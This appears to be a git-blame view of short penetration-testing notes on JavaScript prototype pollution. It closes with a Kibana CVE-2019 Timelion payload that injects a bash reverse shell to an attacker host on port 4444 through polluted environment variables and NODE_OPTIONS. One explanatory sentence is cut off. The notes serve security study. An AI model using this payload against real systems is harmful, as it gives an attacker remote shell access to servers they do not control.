2022-11-13 22:38:01 +01:00
|
|
|
# Prototype Pollution
|
|
|
|
|
|
2023-08-12 23:47:12 +02:00
|
|
|
Overwrite built in properties, like constructor, toString of an object.
|
|
|
|
|
|
|
|
|
|
Any other instance inherits properties from `Object.__proto__`. toString() is
|
|
|
|
|
inherited by all objects.
|
|
|
|
|
That means if the `toString()` functions is overwritten it is changed in all
|
|
|
|
|
other objects as well.
|
|
|
|
|
|
2022-11-13 22:38:01 +01:00
|
|
|
## Usage
|
2023-08-12 23:47:12 +02:00
|
|
|
|
|
|
|
|
Access to prototype can be gained inside an object, as an example
|
|
|
|
|
|
2022-11-13 22:38:01 +01:00
|
|
|
```javascript
|
|
|
|
|
obj.__proto__
|
|
|
|
|
Object.prototype
|
|
|
|
|
```
|
2023-08-12 23:47:12 +02:00
|
|
|
|
|
|
|
|
Create an object
|
|
|
|
|
|
2022-11-13 22:38:01 +01:00
|
|
|
```javascript
|
|
|
|
|
let obj = {}
|
|
|
|
|
```
|
2023-08-12 23:47:12 +02:00
|
|
|
|
|
|
|
|
Create properties inside `__proto__`.
|
|
|
|
|
|
2022-11-13 22:38:01 +01:00
|
|
|
```javascript
|
|
|
|
|
obj.__proto__.isAdmin = true
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### Kibana CVE 2019
|
2023-08-12 23:47:12 +02:00
|
|
|
|
|
|
|
|
A concrete example is a Kibana prototype pollution from CVE from 2019. Write
|
|
|
|
|
reverse bash into variables so they get
|
|
|
|
|
Therefore Use the following node functions
|
|
|
|
|
|
|
|
|
|
* `require`
|
|
|
|
|
* `eval`
|
|
|
|
|
|
2022-11-13 22:38:01 +01:00
|
|
|
```javascript
|
|
|
|
|
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
|
|
|
|
|
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
|
|
|
|
|
```
|
